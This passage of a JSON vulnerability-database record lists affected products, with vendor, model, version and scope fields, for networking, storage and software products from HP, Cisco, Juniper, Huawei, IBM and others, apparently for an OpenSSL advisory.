"hp", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "uacos c4.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsr-500n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "junos 12.1x44-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "msr3000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.4" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.3" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "m220 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58300" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4800g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "junos 12.1x44-d34", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "secure analytics 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "119000" }, { "model": "secure analytics 2014.2r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.12" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "junos 13.1r3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "10" }, { "model": "prime performance manager for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "oneview", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "f1000a and s family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "u200a and m family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "flex system fc5022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "850/8700" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "junos 11.4r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "junos d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.3" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.1" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "hsr6602 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.2" }, { "model": "fastsetup", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.5" }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ive os 8.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "msr93x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.0" }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wx5002/5004 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "updatexpress system packs installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "security network intrusion prevention system gx5208", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "junos 11.4r12", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "a6600 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "si switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51200" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "junos 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vsr1000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.3r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "junos 12.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.2" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.8" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "junos 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "junos 12.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.9" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "msr20 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 12.1r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 13.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 11.4r10-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.5" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "junos 5.0r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129000" }, { "model": "fortios build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0589" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "hsr6800 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.1" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "msr20 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "msr1000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "secblade iii", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 10.4r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "junos 12.1r8-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, 